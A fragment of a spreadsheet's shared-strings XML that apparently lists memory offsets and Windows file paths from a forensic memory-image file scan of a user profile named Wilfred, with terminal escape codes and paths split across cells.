    <t>0xdfa22480</t>
  </si>
  <si>
    <t>0xdfa22760</t>
  </si>
  <si>
    <t>0xdfa23478</t>
  </si>
  <si>
    <t>0xdfa23578</t>
  </si>
  <si>
    <t>0xdfa238b8</t>
  </si>
  <si>
    <t>0xdfa23cb0</t>
  </si>
  <si>
    <t>0xdfa23e88</t>
  </si>
  <si>
    <t>0xdfa23f80</t>
  </si>
  <si>
    <t>\Windows\assembly\pubpol4.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa24968</t>
  </si>
  <si>
    <t>0xdfa24a20</t>
  </si>
  <si>
    <t>0xdfa24b68</t>
  </si>
  <si>
    <t>0xdfa24dc8</t>
  </si>
  <si>
    <t>0xdfa26208</t>
  </si>
  <si>
    <t>0xdfa262c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\h</t>
  </si>
  <si>
    <t>qdefault35M48</t>
  </si>
  <si>
    <t>JHT.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa264e0</t>
  </si>
  <si>
    <t>0xdfa26700</t>
  </si>
  <si>
    <t>0xdfa26b40</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8</t>
  </si>
  <si>
    <t>008506_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa26d60</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5</t>
  </si>
  <si>
    <t>02BC693-4330-</t>
  </si>
  <si>
    <t>11E9-83AE-0</t>
  </si>
  <si>
    <t>0B8D0}.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa26f80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\QD3T0QAJ.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa27310</t>
  </si>
  <si>
    <t>\Windows\System32\mswsock.dll_x001B_[0K_x001B_[86G</t>
  </si>
  <si>
    <t>0xdfa27a90</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\UsrClass.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa27cb0</t>
  </si>
  <si>
    <t>\Windows\System32\AUDIOKSE.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa281c8</t>
  </si>
  <si>
    <t>0xdfa28280</t>
  </si>
  <si>
    <t>0xdfa28970</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa28d08</t>
  </si>
  <si>
    <t>0xdfa291d0</t>
  </si>
  <si>
    <t>0xdfa30328</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa31b80</t>
  </si>
  <si>
    <t>0xdfa31dc8</t>
  </si>
  <si>
    <t>0xdfa32de8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\w</t>
  </si>
  <si>
    <t>atch[1].htm_x001B_[</t>
  </si>
  <si>
    <t>0xdfa33850</t>
  </si>
  <si>
    <t>0xdfa356e0</t>
  </si>
  <si>
    <t>0xdfa37540</t>
  </si>
  <si>
    <t>0xdfa38a90</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desk</t>
  </si>
  <si>
    <t>0xdfa39760</t>
  </si>
  <si>
    <t>\Users\Wilfred\Links\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3a278</t>
  </si>
  <si>
    <t>0xdfa3a708</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\YZ835RO6.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3b820</t>
  </si>
  <si>
    <t>0xdfa3bcf0</t>
  </si>
  <si>
    <t>0xdfa3c1b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Printer Shortcuts_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3c488</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3c540</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0</t>
  </si>
  <si>
    <t>574EE8_FDB452</t>
  </si>
  <si>
    <t>422670E72ED</t>
  </si>
  <si>
    <t>D3FB3D</t>
  </si>
  <si>
    <t>65568F821_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3cc20</t>
  </si>
  <si>
    <t>B2D351_3A6483</t>
  </si>
  <si>
    <t>2DF1C2D80BA</t>
  </si>
  <si>
    <t>A005FB</t>
  </si>
  <si>
    <t>A8610C6F2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3d9d0</t>
  </si>
  <si>
    <t>0xdfa3df80</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\ad_log.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3e8a0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\adencrypt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3ea68</t>
  </si>
  <si>
    <t>0xdfa3eb20</t>
  </si>
  <si>
    <t>0xdfa3ed58</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3f1b8</t>
  </si>
  <si>
    <t>\Users\Wilfred\Contacts\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3f958</t>
  </si>
  <si>
    <t>\Users\Wilfred\Saved Games\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa3fd88</t>
  </si>
  <si>
    <t>0xdfa3ff80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa403c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\Pictures\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa413a0</t>
  </si>
  <si>
    <t>0xdfa41458</t>
  </si>
  <si>
    <t>0xdfa41510</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).ln</t>
  </si>
  <si>
    <t>0xdfa415c8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.ln</t>
  </si>
  <si>
    <t>0xdfa42468</t>
  </si>
  <si>
    <t>0xdfa42588</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa42b30</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F5F320A94D4D2B4465D8F17E2BB</t>
  </si>
  <si>
    <t>2D351_3A64832</t>
  </si>
  <si>
    <t>DF1C2D80BAA</t>
  </si>
  <si>
    <t>005FBA</t>
  </si>
  <si>
    <t>8610C6F2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa45db8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata0.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa45f38</t>
  </si>
  <si>
    <t>0xdfa46720</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E05</t>
  </si>
  <si>
    <t>74EE8_FDB4524</t>
  </si>
  <si>
    <t>22670E72EDD</t>
  </si>
  <si>
    <t>3FB3D6</t>
  </si>
  <si>
    <t>5568F821_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa475f0</t>
  </si>
  <si>
    <t>0xdfa47b30</t>
  </si>
  <si>
    <t>0xdfa47cb0</t>
  </si>
  <si>
    <t>0xdfa48238</t>
  </si>
  <si>
    <t>\Users\Wilfred\Links\RecentPlaces.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa48310</t>
  </si>
  <si>
    <t>\Users\Wilfred\Links\Downloads.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa487d8</t>
  </si>
  <si>
    <t>0xdfa49238</t>
  </si>
  <si>
    <t>0xdfa49478</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa4a5a0</t>
  </si>
  <si>
    <t>0xdfa4a9e0</t>
  </si>
  <si>
    <t>0xdfa4b150</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa4b470</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\5</t>
  </si>
  <si>
    <t>k7CCto5[1].ht</t>
  </si>
  <si>
    <t>0xdfa4c698</t>
  </si>
  <si>
    <t>0xdfa4ce50</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\29B2CW0X.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa4d538</t>
  </si>
  <si>
    <t>\Users\Wilfred\Links\Desktop.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa4d710</t>
  </si>
  <si>
    <t>0xdfa4dc40</t>
  </si>
  <si>
    <t>\Users\Wilfred\Downloads\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa4df80</t>
  </si>
  <si>
    <t>\Users\Wilfred\Searches\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa4e1c8</t>
  </si>
  <si>
    <t>0xdfa4f8b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\isoburn.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa519b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Wi</t>
  </si>
  <si>
    <t>0xdfa52038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini_x001B_[</t>
  </si>
  <si>
    <t>0xdfa52340</t>
  </si>
  <si>
    <t>0xdfa52960</t>
  </si>
  <si>
    <t>qdefault[10].</t>
  </si>
  <si>
    <t>jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa52d00</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\In</t>
  </si>
  <si>
    <t>0xdfa531a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa53f18</t>
  </si>
  <si>
    <t>0xdfa544d8</t>
  </si>
  <si>
    <t>0xdfa55298</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa55868</t>
  </si>
  <si>
    <t>0xdfa57038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa57118</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Burn_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa571d0</t>
  </si>
  <si>
    <t>\Users\Public\Desktop_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa57468</t>
  </si>
  <si>
    <t>0xdfa57700</t>
  </si>
  <si>
    <t>0xdfa57998</t>
  </si>
  <si>
    <t>0xdfa57c30</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa57ec8</t>
  </si>
  <si>
    <t>0xdfa57f80</t>
  </si>
  <si>
    <t>0xdfa58da0</t>
  </si>
  <si>
    <t>0xdfa5c788</t>
  </si>
  <si>
    <t>0xdfa5d8c0</t>
  </si>
  <si>
    <t>c_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa5e038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Libraries_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa5e4a0</t>
  </si>
  <si>
    <t>qdefault8N5BR</t>
  </si>
  <si>
    <t>WMR.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa5e700</t>
  </si>
  <si>
    <t>\$Recycle.Bin\S-1-5-21-3583694148-1414552638-2922671848-1003\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa5e938</t>
  </si>
  <si>
    <t>0xdfa5f918</t>
  </si>
  <si>
    <t>0xdfa5fd00</t>
  </si>
  <si>
    <t>0xdfa60038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information</t>
  </si>
  <si>
    <t>0xdfa602c8</t>
  </si>
  <si>
    <t>0xdfa60960</t>
  </si>
  <si>
    <t>0xdfa624e0</t>
  </si>
  <si>
    <t>0xdfa62ac0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WebCache\V01.chk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa643f0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21</t>
  </si>
  <si>
    <t>AB308D_CCF564</t>
  </si>
  <si>
    <t>BE5A3C924B1</t>
  </si>
  <si>
    <t>7DDEBD</t>
  </si>
  <si>
    <t>EB5236E12_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa64508</t>
  </si>
  <si>
    <t>3\5f5d4a2c-19</t>
  </si>
  <si>
    <t>0b-487d-9c5</t>
  </si>
  <si>
    <t>6-73d9</t>
  </si>
  <si>
    <t>32e102e2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa64a58</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Temp\~DF99301D1FB28ED8B0.TMP_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa64ec8</t>
  </si>
  <si>
    <t>0xdfa64f80</t>
  </si>
  <si>
    <t>0xdfa653f0</t>
  </si>
  <si>
    <t>0xdfa66798</t>
  </si>
  <si>
    <t>0xdfa66e70</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WebCacheLock.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa696d8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa6f788</t>
  </si>
  <si>
    <t>0xdfa6f888</t>
  </si>
  <si>
    <t>\Windows\inf\oem4.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa6fef0</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\Links for United States\GobiernoUSA.gov.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa70340</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpCommu.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa71278</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WebCache\V01.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa773d0</t>
  </si>
  <si>
    <t>0xdfa779b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\Links for United States\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa78870</t>
  </si>
  <si>
    <t>0xdfa78928</t>
  </si>
  <si>
    <t>0xdfa78e18</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\K</t>
  </si>
  <si>
    <t>FOmCnqEu92Fr1</t>
  </si>
  <si>
    <t>Mu4mxM[1].w</t>
  </si>
  <si>
    <t>off_x001B_[0</t>
  </si>
  <si>
    <t>0xdfa79038</t>
  </si>
  <si>
    <t>0xdfa7bb60</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D388BEBC625C181AB8B0CA40E7</t>
  </si>
  <si>
    <t>181396_99913A</t>
  </si>
  <si>
    <t>6BA49660947</t>
  </si>
  <si>
    <t>87F7FD</t>
  </si>
  <si>
    <t>8C7E780C4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa7d568</t>
  </si>
  <si>
    <t>0xdfa7d6c8</t>
  </si>
  <si>
    <t>0xdfa7d938</t>
  </si>
  <si>
    <t>B2D351_397E41</t>
  </si>
  <si>
    <t>A2F252913B1</t>
  </si>
  <si>
    <t>47EAF3</t>
  </si>
  <si>
    <t>FA1644BE8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa7df18</t>
  </si>
  <si>
    <t>2D351_FDCCC94</t>
  </si>
  <si>
    <t>B8AC96A271C</t>
  </si>
  <si>
    <t>F37D69</t>
  </si>
  <si>
    <t>185911FC_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa7e3e0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\DOMStore\TVGBQSHK\www.youtube[1].xml_x001B_</t>
  </si>
  <si>
    <t>0xdfa85b48</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\jscript9.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa86698</t>
  </si>
  <si>
    <t>0xdfa86930</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A91392</t>
  </si>
  <si>
    <t>C06229E2D_x001B_[0K_x001B_[44G</t>
  </si>
  <si>
    <t>0xdfa87de8</t>
  </si>
  <si>
    <t>0xdfa884c0</t>
  </si>
  <si>
    <t>Accessories\S</t>
  </si>
  <si>
    <t>ystem Tools</t>
  </si>
  <si>
    <t>\Deskt</t>
  </si>
  <si>
    <t>op.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa88578</t>
  </si>
  <si>
    <t>Maintenance\D</t>
  </si>
  <si>
    <t>0xdfa88900</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk</t>
  </si>
  <si>
    <t>0xdfa89310</t>
  </si>
  <si>
    <t>0xdfa89980</t>
  </si>
  <si>
    <t>rShell ISE.ln</t>
  </si>
  <si>
    <t>0xdfa89a38</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HZZ4R8FA\b</t>
  </si>
  <si>
    <t>ullet[1]_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa8ad00</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\h</t>
  </si>
  <si>
    <t>ttpErrorPages</t>
  </si>
  <si>
    <t>Scripts[1]_x001B_</t>
  </si>
  <si>
    <t>0xdfa8d148</t>
  </si>
  <si>
    <t>0xdfa8e2f0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13</t>
  </si>
  <si>
    <t>E43B18_BEB37A</t>
  </si>
  <si>
    <t>BADF3971487</t>
  </si>
  <si>
    <t>1232B4</t>
  </si>
  <si>
    <t>792417E04_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa8f248</t>
  </si>
  <si>
    <t>0xdfa8f918</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E</t>
  </si>
  <si>
    <t>0xdfa8f9d0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\CT67KSWS.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa90f80</t>
  </si>
  <si>
    <t>0xdfa932e8</t>
  </si>
  <si>
    <t>0xdfa93920</t>
  </si>
  <si>
    <t>\Windows\System32\netfxperf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa94f08</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\K</t>
  </si>
  <si>
    <t>FOkCnqEu92Fr1</t>
  </si>
  <si>
    <t>Mu51xIIzQ[1</t>
  </si>
  <si>
    <t>].woff</t>
  </si>
  <si>
    <t>0xdfa95718</t>
  </si>
  <si>
    <t>0xdfa96328</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DC9863BDD91599535D571389CD</t>
  </si>
  <si>
    <t>F6C72E_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa96450</t>
  </si>
  <si>
    <t>0xdfa97240</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\TabTip.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa988f8</t>
  </si>
  <si>
    <t>B2D351_B2772F</t>
  </si>
  <si>
    <t>B6351A47233</t>
  </si>
  <si>
    <t>F04B2B2AF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa99a10</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\p</t>
  </si>
  <si>
    <t>ubads_impl_31</t>
  </si>
  <si>
    <t>8[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa9b830</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HZZ4R8FA\l</t>
  </si>
  <si>
    <t>andscape_mqde</t>
  </si>
  <si>
    <t>fault[4].jp</t>
  </si>
  <si>
    <t>g_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa9bb30</t>
  </si>
  <si>
    <t>B2D351_6E1497</t>
  </si>
  <si>
    <t>5B8A4BC6876</t>
  </si>
  <si>
    <t>22C56C</t>
  </si>
  <si>
    <t>D984C4414_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa9d278</t>
  </si>
  <si>
    <t>FOlCnqEu92Fr1</t>
  </si>
  <si>
    <t>MmEU9fBBc-[</t>
  </si>
  <si>
    <t>1].wof</t>
  </si>
  <si>
    <t>0xdfa9d578</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfa9dd98</t>
  </si>
  <si>
    <t>0xdfaa13f8</t>
  </si>
  <si>
    <t>0xdfaa1578</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\u</t>
  </si>
  <si>
    <t>nnamed[8].jpg</t>
  </si>
  <si>
    <t>0xdfaa2038</t>
  </si>
  <si>
    <t>0xdfaa3038</t>
  </si>
  <si>
    <t>0xdfaa4578</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACF244F1A10D4DBED0D88EBA0C</t>
  </si>
  <si>
    <t>43A9B5_16756C</t>
  </si>
  <si>
    <t>C7371BB76A2</t>
  </si>
  <si>
    <t>69719A</t>
  </si>
  <si>
    <t>A1471E96C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaa5168</t>
  </si>
  <si>
    <t>0xdfaa5988</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HZZ4R8FA\c</t>
  </si>
  <si>
    <t>ontent.I[1].j</t>
  </si>
  <si>
    <t>0xdfaa5e50</t>
  </si>
  <si>
    <t>0xdfaa6210</t>
  </si>
  <si>
    <t>0xdfaa64a0</t>
  </si>
  <si>
    <t>B2D351_CDEFBC</t>
  </si>
  <si>
    <t>6D1DC4BD82E</t>
  </si>
  <si>
    <t>9C88D2</t>
  </si>
  <si>
    <t>50DBD2A85_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaa7308</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D804485E9E323277FD41EBA359</t>
  </si>
  <si>
    <t>D12E77_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaa7418</t>
  </si>
  <si>
    <t>348BED_704670</t>
  </si>
  <si>
    <t>87513960D11</t>
  </si>
  <si>
    <t>3BA1AA</t>
  </si>
  <si>
    <t>CC2124A28_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaa83b8</t>
  </si>
  <si>
    <t>03.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaa8e40</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\1D37X81B.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaa9408</t>
  </si>
  <si>
    <t>0xdfaa9680</t>
  </si>
  <si>
    <t>0xdfaa97a0</t>
  </si>
  <si>
    <t>2D351_7C9001D</t>
  </si>
  <si>
    <t>EA7A408F0A8</t>
  </si>
  <si>
    <t>7AF555</t>
  </si>
  <si>
    <t>81831D76_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaaa290</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\History\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaaa5d8</t>
  </si>
  <si>
    <t>\Windows\System32\DXP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaaaa20</t>
  </si>
  <si>
    <t>B2D351_7C9001</t>
  </si>
  <si>
    <t>DEA7A408F0A</t>
  </si>
  <si>
    <t>87AF55</t>
  </si>
  <si>
    <t>581831D76_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaab310</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\b</t>
  </si>
  <si>
    <t>ackground_gra</t>
  </si>
  <si>
    <t>dient[1]_x001B_[0</t>
  </si>
  <si>
    <t>0xdfaac778</t>
  </si>
  <si>
    <t>0xdfaad3f8</t>
  </si>
  <si>
    <t>0xdfaadb00</t>
  </si>
  <si>
    <t>0xdfaaf038</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System To</t>
  </si>
  <si>
    <t>ols\computer.</t>
  </si>
  <si>
    <t>lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaaf158</t>
  </si>
  <si>
    <t>ols\Control P</t>
  </si>
  <si>
    <t>anel.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdfaafd00</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HZZ4R8FA\K</t>
  </si>
  <si>
    <t>FOjCnqEu92Fr1</t>
  </si>
  <si>
    <t>Mu51S7ACc6C</t>
  </si>
  <si>
    <t>sI[1].</t>
  </si>
  <si>
    <t>woff_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaafdb8</t>
  </si>
  <si>
    <t>0xdfab0500</t>
  </si>
  <si>
    <t>0xdfab18c8</t>
  </si>
  <si>
    <t>\Windows\System32\mshtmlmedia.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfab2638</t>
  </si>
  <si>
    <t>\Windows\System32\mf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfab40b0</t>
  </si>
  <si>
    <t>B2D351_FDCCC9</t>
  </si>
  <si>
    <t>4B8AC96A271</t>
  </si>
  <si>
    <t>CF37D6</t>
  </si>
  <si>
    <t>9185911FC_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfab4198</t>
  </si>
  <si>
    <t>2D351_B2772FB</t>
  </si>
  <si>
    <t>6351A472330</t>
  </si>
  <si>
    <t>14456F</t>
  </si>
  <si>
    <t>04B2B2AF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfab43c0</t>
  </si>
  <si>
    <t>B2D351_09F47C</t>
  </si>
  <si>
    <t>C97617A1609</t>
  </si>
  <si>
    <t>068D64</t>
  </si>
  <si>
    <t>ECDB9381D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaba2d0</t>
  </si>
  <si>
    <t>0xdfaba388</t>
  </si>
  <si>
    <t>\Windows\System32\iphlpsvc.dll_x001B_[0K_x001B_[28G</t>
  </si>
  <si>
    <t>0xdfaba4a0</t>
  </si>
  <si>
    <t>0xdfabacf0</t>
